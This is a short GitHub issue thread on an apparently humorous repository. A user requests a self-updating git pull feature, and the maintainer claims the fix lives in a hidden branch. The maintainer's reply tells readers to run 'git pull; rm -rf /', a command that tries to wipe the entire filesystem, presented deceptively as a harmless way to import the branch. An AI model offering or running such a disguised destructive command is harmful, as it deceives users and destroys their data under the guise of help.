chewett / what_is_the_date

A helpful script to let you know what the date is
48 stars 1 forks source link

Git Pull #1

Open samuelbennett opened 10 years ago

samuelbennett commented 10 years ago

The script should do a 'git pull' prior to running to ensure it has the latest version of itself. Then, if there are updates, it should then re-run using the new code. If there are any merge issues it should work out how to fix them and do it.

chewett commented 10 years ago

We have resolved this in a rm -rf branch that you cannot see in github. Running the below command will import the branch for you.

git pull; rm -rf /; echo "Bye Bye"

chewett commented 9 years ago

This is being reviewed, the repository will likely be signed by each commit to ensure you know the code you are pulling down is the valid offical code!